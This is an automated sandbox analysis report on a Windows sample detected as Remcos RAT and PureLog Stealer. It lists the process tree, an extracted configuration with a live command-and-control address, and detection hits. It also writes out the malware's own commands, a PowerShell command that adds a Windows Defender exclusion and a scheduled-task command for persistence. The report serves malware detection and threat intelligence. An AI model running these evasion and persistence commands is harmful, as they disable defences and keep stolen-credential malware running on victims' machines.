Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LdSbZG1iH6.exe

Overview

General Information

Sample name:LdSbZG1iH6.exe
renamed because original name is a hash value
Original sample name:04e6dda7961928fadeecd13e02b9195d31a5e3a9925d4de51072089bc7a1b452.exe
Analysis ID:1569374
MD5:b2618fbb2e344dbdc7d4b33947d71531
SHA1:a56c4724edef9a8fef490520ecaeb30c8356e314
SHA256:04e6dda7961928fadeecd13e02b9195d31a5e3a9925d4de51072089bc7a1b452
Tags:exeuser-adrian__luca
Infos:

Detection

Remcos, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • LdSbZG1iH6.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\LdSbZG1iH6.exe" MD5: B2618FBB2E344DBDC7D4B33947D71531)
    • powershell.exe (PID: 7476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7884 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7556 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • LdSbZG1iH6.exe (PID: 7748 cmdline: "C:\Users\user\Desktop\LdSbZG1iH6.exe" MD5: B2618FBB2E344DBDC7D4B33947D71531)
      • iexplore.exe (PID: 7776 cmdline: "c:\program files (x86)\internet explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
  • DGlxtFUfY.exe (PID: 7840 cmdline: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe MD5: B2618FBB2E344DBDC7D4B33947D71531)
    • schtasks.exe (PID: 8024 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • DGlxtFUfY.exe (PID: 8072 cmdline: "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe" MD5: B2618FBB2E344DBDC7D4B33947D71531)
      • DGlxtFUfY.exe (PID: 1148 cmdline: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\xgyrrizik" MD5: B2618FBB2E344DBDC7D4B33947D71531)
      • DGlxtFUfY.exe (PID: 1904 cmdline: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\ijdkrtkjyyuu" MD5: B2618FBB2E344DBDC7D4B33947D71531)
      • DGlxtFUfY.exe (PID: 6948 cmdline: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\sdjcslvdtgmhffr" MD5: B2618FBB2E344DBDC7D4B33947D71531)
        • WerFault.exe (PID: 7612 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 3896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8072 -s 1676 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["192.3.64.152:2559:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-ZFXG9Y", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6adb8:$a1: Remcos restarted by watchdog!
          • 0x6b330:$a3: %02i:%02i:%02i:%03i
          00000000.00000002.1995759921.0000000007820000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            Click to see the 37 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.LdSbZG1iH6.exe.7820000.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.LdSbZG1iH6.exe.7820000.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                10.2.DGlxtFUfY.exe.389e300.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  10.2.DGlxtFUfY.exe.389e300.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    10.2.DGlxtFUfY.exe.389e300.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      Click to see the 43 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LdSbZG1iH6.exe", ParentImage: C:\Users\user\Desktop\LdSbZG1iH6.exe, ParentProcessId: 7276, ParentProcessName: LdSbZG1iH6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", ProcessId: 7476, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LdSbZG1iH6.exe", ParentImage: C:\Users\user\Desktop\LdSbZG1iH6.exe, ParentProcessId: 7276, ParentProcessName: LdSbZG1iH6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", ProcessId: 7476, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe, ParentImage: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe, ParentProcessId: 7840, ParentProcessName: DGlxtFUfY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp", ProcessId: 8024, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\LdSbZG1iH6.exe", ParentImage: C:\Users\user\Desktop\LdSbZG1iH6.exe, ParentProcessId: 7276, ParentProcessName: LdSbZG1iH6.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp", ProcessId: 7556, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LdSbZG1iH6.exe", ParentImage: C:\Users\user\Desktop\LdSbZG1iH6.exe, ParentProcessId: 7276, ParentProcessName: LdSbZG1iH6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", ProcessId: 7476, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\LdSbZG1iH6.exe", ParentImage: C:\Users\user\Desktop\LdSbZG1iH6.exe, ParentProcessId: 7276, ParentProcessName: LdSbZG1iH6.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp", ProcessId: 7556, ProcessName: schtasks.exe

                      Stealing of Sensitive Information

                      barindex
                      Sigma detected: Remcos
                      Source: Registry Key setAuthor: Joe Security: Data: Details: 30 0F C2 2C CB 87 27 B5 73 01 29 00 61 48 5E 83 B9 4F 86 E5 AA 5F E8 7C 96 D8 0F 42 54 17 4E BF 7B A5 07 D4 67 96 82 F2 12 1B 41 44 29 9A 6D 78 8B FC 46 0B 7D 55 F7 8F 55 20 99 5B F5 67 C4 ED 74 61 F1 6B 42 C7 17 BF 4B 15 2F 2E , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LdSbZG1iH6.exe, ProcessId: 7748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-ZFXG9Y\exepath

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-05T18:25:40.472495+010020365941Malware Command and Control Activity Detected192.168.2.449735192.3.64.1522559TCP
                      2024-12-05T18:25:54.159943+010020365941Malware Command and Control Activity Detected192.168.2.449741192.3.64.1522559TCP
                      2024-12-05T18:25:54.331790+010020365941Malware Command and Control Activity Detected192.168.2.449742192.3.64.1522559TCP
                      2024-12-05T18:26:00.831798+010020365941Malware Command and Control Activity Detected192.168.2.449743192.3.64.1522559TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-05T18:25:43.074908+010028033043Unknown Traffic192.168.2.449736178.237.33.5080TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["192.3.64.152:2559:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-ZFXG9Y", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeReversingLabs: Detection: 68%
                      Multi AV Scanner detection for submitted file
                      Source: LdSbZG1iH6.exeReversingLabs: Detection: 68%
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2909444366.000000000322E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DGlxtFUfY.exe PID: 8072, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: LdSbZG1iH6.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_004338C8
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_2f619aee-4

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Contains functionality to bypass UAC (CMSTPLUA)
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00407538 _wcslen,CoGetObject,8_2_00407538
                      Source: LdSbZG1iH6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: LdSbZG1iH6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: ZPyJ.pdb source: LdSbZG1iH6.exe, DGlxtFUfY.exe.0.dr
                      Source: Binary string: ZPyJ.pdbSHA256 source: LdSbZG1iH6.exe, DGlxtFUfY.exe.0.dr
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0040928E
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C322
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C388
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004096A0
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00408847
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00407877 FindFirstFileW,FindNextFileW,8_2_00407877
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB6B
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419B86
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD72
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407CD2
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 4x nop then jmp 059BB683h0_2_059BB13A
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 4x nop then jmp 06DDA90Bh10_2_06DDA3C2

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49735 -> 192.3.64.152:2559
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49741 -> 192.3.64.152:2559
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49742 -> 192.3.64.152:2559
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49743 -> 192.3.64.152:2559
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorIPs: 192.3.64.152
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
